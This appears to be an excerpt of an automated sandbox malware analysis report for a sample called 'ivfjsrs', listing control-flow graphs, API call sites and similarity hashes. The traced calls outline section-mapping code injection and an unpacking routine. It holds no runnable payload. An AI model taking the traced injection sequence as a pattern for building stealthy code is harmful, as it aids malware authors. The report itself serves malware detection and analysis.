                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
                    • Instruction ID: 54f816a1873a7b3c05ae102fbfa0db20c4fddfd22ceccde8511ae2322fd00f16
                    • Opcode Fuzzy Hash: 7299a8bd44a0f09a9814cad8d1b839903cf1e6b88029ded735f1f7f3eb76a162
                    • Instruction Fuzzy Hash: ED514B71900204BBEB209F91CC49FEFBBB8FF85B00F10412AF912BA2E4D6759905CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 204 4014ed-4014ef 205 4014f2-401546 call 401163 204->205 206 401547-40154a 204->206 208 40154b-401550 205->208 229 401548 205->229 206->208 212 401866-40186e 208->212 213 401556-401567 208->213 212->208 221 401873-401889 212->221 219 401864 213->219 220 40156d-401596 213->220 219->221 220->219 233 40159c-4015b3 NtDuplicateObject 220->233 226 40187a-401885 221->226 227 40188c-4018c0 call 401163 221->227 226->227 229->208 233->219 236 4015b9-4015dd NtCreateSection 233->236 237 401639-40165f NtCreateSection 236->237 238 4015df-401600 NtMapViewOfSection 236->238 237->219 242 401665-401669 237->242 238->237 240 401602-40161e NtMapViewOfSection 238->240 240->237 243 401620-401636 240->243 242->219 245 40166f-401690 NtMapViewOfSection 242->245 243->237 245->219 247 401696-4016b2 NtMapViewOfSection 245->247 247->219 249 4016b8 call 4016bd 247->249
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
                    • Instruction ID: d78456e69b9ee3bedd10ceae2949c316c70905ac9deb4f17dd21856c0d7271cf
                    • Opcode Fuzzy Hash: f8cd90a01b8841fab90bd03913f1d260bde8b9aa0dc8a539f499ff1e16c1cfe2
                    • Instruction Fuzzy Hash: 785139B1900209BFEB209F91CC48FEFBBB8EF85B04F144529F911BA2A5D6759945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 251 401507-401546 call 401163 259 401548 251->259 260 40154b-401550 251->260 259->260 262 401866-40186e 260->262 263 401556-401567 260->263 262->260 268 401873-401889 262->268 266 401864 263->266 267 40156d-401596 263->267 266->268 267->266 276 40159c-4015b3 NtDuplicateObject 267->276 270 40187a-401885 268->270 271 40188c-4018c0 call 401163 268->271 270->271 276->266 279 4015b9-4015dd NtCreateSection 276->279 280 401639-40165f NtCreateSection 279->280 281 4015df-401600 NtMapViewOfSection 279->281 280->266 285 401665-401669 280->285 281->280 283 401602-40161e NtMapViewOfSection 281->283 283->280 286 401620-401636 283->286 285->266 288 40166f-401690 NtMapViewOfSection 285->288 286->280 288->266 290 401696-4016b2 NtMapViewOfSection 288->290 290->266 292 4016b8 call 4016bd 290->292
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
                    • Instruction ID: 2f2d373c220c5723e0f020d1249cf16f546f345e4a7fd1e76d53166f9789eae4
                    • Opcode Fuzzy Hash: 9da137313ded7fbbc6789e5bb01359d8fcafad73d8b78d10eab5d550d18b9b7c
                    • Instruction Fuzzy Hash: CC5138B1900245BFEB209F92CC48FEFBBB8EF85B00F104129F911BA2E5D6719905CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 294 401518-401546 call 401163 303 401548 294->303 304 40154b-401550 294->304 303->304 306 401866-40186e 304->306 307 401556-401567 304->307 306->304 312 401873-401889 306->312 310 401864 307->310 311 40156d-401596 307->311 310->312 311->310 320 40159c-4015b3 NtDuplicateObject 311->320 314 40187a-401885 312->314 315 40188c-4018c0 call 401163 312->315 314->315 320->310 323 4015b9-4015dd NtCreateSection 320->323 324 401639-40165f NtCreateSection 323->324 325 4015df-401600 NtMapViewOfSection 323->325 324->310 329 401665-401669 324->329 325->324 327 401602-40161e NtMapViewOfSection 325->327 327->324 330 401620-401636 327->330 329->310 332 40166f-401690 NtMapViewOfSection 329->332 330->324 332->310 334 401696-4016b2 NtMapViewOfSection 332->334 334->310 336 4016b8 call 4016bd 334->336
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
                    • Instruction ID: 96445da88c21ac9a18ba7f06942a5f985ee594873a048ae4082ffef3eedc30ed
                    • Opcode Fuzzy Hash: f5e5914faca7036a9f2b2587145b32dc03ad0df06ff91578a14921ad59b994f8
                    • Instruction Fuzzy Hash: 765128B1900245BBEB209F92CC48FEFBBB8EF85B04F104529F911BA2E5D6759945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 40151c-401546 call 401163 342 401548 338->342 343 40154b-401550 338->343 342->343 345 401866-40186e 343->345 346 401556-401567 343->346 345->343 351 401873-401889 345->351 349 401864 346->349 350 40156d-401596 346->350 349->351 350->349 359 40159c-4015b3 NtDuplicateObject 350->359 353 40187a-401885 351->353 354 40188c-4018c0 call 401163 351->354 353->354 359->349 362 4015b9-4015dd NtCreateSection 359->362 363 401639-40165f NtCreateSection 362->363 364 4015df-401600 NtMapViewOfSection 362->364 363->349 368 401665-401669 363->368 364->363 366 401602-40161e NtMapViewOfSection 364->366 366->363 369 401620-401636 366->369 368->349 371 40166f-401690 NtMapViewOfSection 368->371 369->363 371->349 373 401696-4016b2 NtMapViewOfSection 371->373 373->349 375 4016b8 call 4016bd 373->375
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FB
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401619
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040165A
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040168B
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016AD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
                    • Instruction ID: bb4afbbbce9fe7f1faeb83e027975ebaba5635be540f9387007d6567f38c581b
                    • Opcode Fuzzy Hash: b3713ec08c7e04deb5c7f374484dc3bee9c28c2fff0b887679791a55d8476689
                    • Instruction Fuzzy Hash: 885119B1900245BFEF209F92CC48FDFBBB8FF85B14F144129F911AA2A5D6719945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 41a003c-41a0047 73 41a0049 72->73 74 41a004c-41a0263 call 41a0a3f call 41a0e0f call 41a0d90 VirtualAlloc 72->74 73->74 89 41a028b-41a0292 74->89 90 41a0265-41a0289 call 41a0a69 74->90 92 41a02a1-41a02b0 89->92 94 41a02ce-41a03c2 VirtualProtect call 41a0cce call 41a0ce7 90->94 92->94 95 41a02b2-41a02cc 92->95 101 41a03d1-41a03e0 94->101 95->92 102 41a0439-41a04b8 VirtualFree 101->102 103 41a03e2-41a0437 call 41a0ce7 101->103 105 41a04be-41a04cd 102->105 106 41a05f4-41a05fe 102->106 103->101 110 41a04d3-41a04dd 105->110 107 41a077f-41a0789 106->107 108 41a0604-41a060d 106->108 114 41a078b-41a07a3 107->114 115 41a07a6-41a07b0 107->115 108->107 111 41a0613-41a0637 108->111 110->106 113 41a04e3-41a0505 110->113 118 41a063e-41a0648 111->118 122 41a0517-41a0520 113->122 123 41a0507-41a0515 113->123 114->115 116 41a086e-41a08be LoadLibraryA 115->116 117 41a07b6-41a07cb 115->117 127 41a08c7-41a08f9 116->127 119 41a07d2-41a07d5 117->119 118->107 120 41a064e-41a065a 118->120 124 41a07d7-41a07e0 119->124 125 41a0824-41a0833 119->125 120->107 126 41a0660-41a066a 120->126 128 41a0526-41a0547 122->128 123->128 129 41a07e2 124->129 130 41a07e4-41a0822 124->130 132 41a0839-41a083c 125->132 131 41a067a-41a0689 126->131 133 41a08fb-41a0901 127->133 134 41a0902-41a091d 127->134 135 41a054d-41a0550 128->135 129->125 130->119 136 41a068f-41a06b2 131->136 137 41a0750-41a077a 131->137 132->116 138 41a083e-41a0847 132->138 133->134 140 41a05e0-41a05ef 135->140 141 41a0556-41a056b 135->141 142 41a06ef-41a06fc 136->142 143 41a06b4-41a06ed 136->143 137->118 144 41a084b-41a086c 138->144 145 41a0849 138->145 140->110 146 41a056f-41a057a 141->146 147 41a056d 141->147 148 41a074b 142->148 149 41a06fe-41a0748 142->149 143->142 144->132 145->116 150 41a059b-41a05bb 146->150 151 41a057c-41a0599 146->151 147->140 148->131 149->148 156 41a05bd-41a05db 150->156 151->156 156->135
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 041A024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_41a0000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: f471ffde7cabfc19271dfa83d3be0f5a12fa30f5b419d0e0976dfc36b7c6a2e4
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 82527978A01229DFDB64CF98C984BACBBB1BF09304F1580D9E54DAB351DB30AA94DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 406b826-406b83f 378 406b841-406b843 377->378 379 406b845 378->379 380 406b84a-406b856 CreateToolhelp32Snapshot 378->380 379->380 381 406b866-406b873 Module32First 380->381 382 406b858-406b85e 380->382 383 406b875-406b876 call 406b4e5 381->383 384 406b87c-406b884 381->384 382->381 389 406b860-406b864 382->389 387 406b87b 383->387 387->384 389->378 389->381
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0406B84E
                    • Module32First.KERNEL32(00000000,00000224), ref: 0406B86E
                    Memory Dump Source
                    • Source File: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Offset: 04064000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_4064000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: e174422aa6d717cfc53b0c3790fa746d5e19580b568c17e1e7ff5aa80c06708e
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 69F062715007216FE7203BB5A88CBAE76F8BF49725F100528EA47E20C0DA70F9458A61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 390 40d47b-40d489 391 40d4a6-40d4c6 call 40d451 LCMapStringW 390->391 392 40d48b-40d4a5 LCMapStringEx 390->392
                    APIs
                    • LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: String
                    • String ID:
                    • API String ID: 2568140703-0
                    • Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
                    • Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 395 41a0e0f-41a0e24 SetErrorMode * 2 396 41a0e2b-41a0e2c 395->396 397 41a0e26 395->397 397->396
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,041A0223,?,?), ref: 041A0E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,041A0223,?,?), ref: 041A0E1E
                    Memory Dump Source
                    • Source File: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_41a0000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: ceddcc526668fc0392ed59e733efbcad85e77cd8ef2a06cba1cf5d2cfe3a2db6
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 67D0123524512877DB002E94DC09BCD7F1CDF09B62F008051FB0DD9080C770954046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 4018c3-40192e call 401163 Sleep call 4013ed 412 401930-401938 call 4014e2 398->412 413 40193d-401990 call 401163 398->413 412->413
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
                    • Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
                    • Opcode Fuzzy Hash: 20e0d23e55f5860cd765092bcd1a4803eab56b051b47866fb1db2e929ae757d2
                    • Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 427 4018ce-40192e call 401163 Sleep call 4013ed 436 401930-401938 call 4014e2 427->436 437 40193d-401990 call 401163 427->437 436->437
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
                    • Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
                    • Opcode Fuzzy Hash: 7169d427e5ce931a1b0669115664685f1c376e8f9b84ee4d7b06600fb2b6ce55
                    • Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 451 4018ed-40192e call 401163 Sleep call 4013ed 462 401930-401938 call 4014e2 451->462 463 40193d-401990 call 401163 451->463 462->463
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
                    • Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
                    • Opcode Fuzzy Hash: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
                    • Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 477 4018f4-40192e call 401163 Sleep call 4013ed 484 401930-401938 call 4014e2 477->484 485 40193d-401990 call 401163 477->485 484->485
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
                    • Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
                    • Opcode Fuzzy Hash: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
                    • Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 499 401907-40192e call 401163 Sleep call 4013ed 507 401930-401938 call 4014e2 499->507 508 40193d-401990 call 401163 499->508 507->508
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
                    • Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
                    • Opcode Fuzzy Hash: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
                    • Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0406B536
                    Memory Dump Source
                    • Source File: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Offset: 04064000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_4064000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 88cbddd041efc29582ebe6b0e1d4dbe0651a1a35422045c04c08f73f78c3fbec
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 4E113979A00208EFDB01DF98C985E98BBF5AF08350F1580A4F949AB361D771EA90DF80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindHandlerForForeignException.LIBCMT ref: 0040B133
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
                    • String ID: LEA$MOC$RCC$TEA
                    • API String ID: 1036487854-2731589300
                    • Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
                    • Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___TypeMatch.LIBCMT ref: 0040B031
                    • IsInExceptionSpec.LIBCMT ref: 0040B0DA
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
                    • String ID: MOC$RCC
                    • API String ID: 2268674365-2084237596
                    • Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
                    • Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99
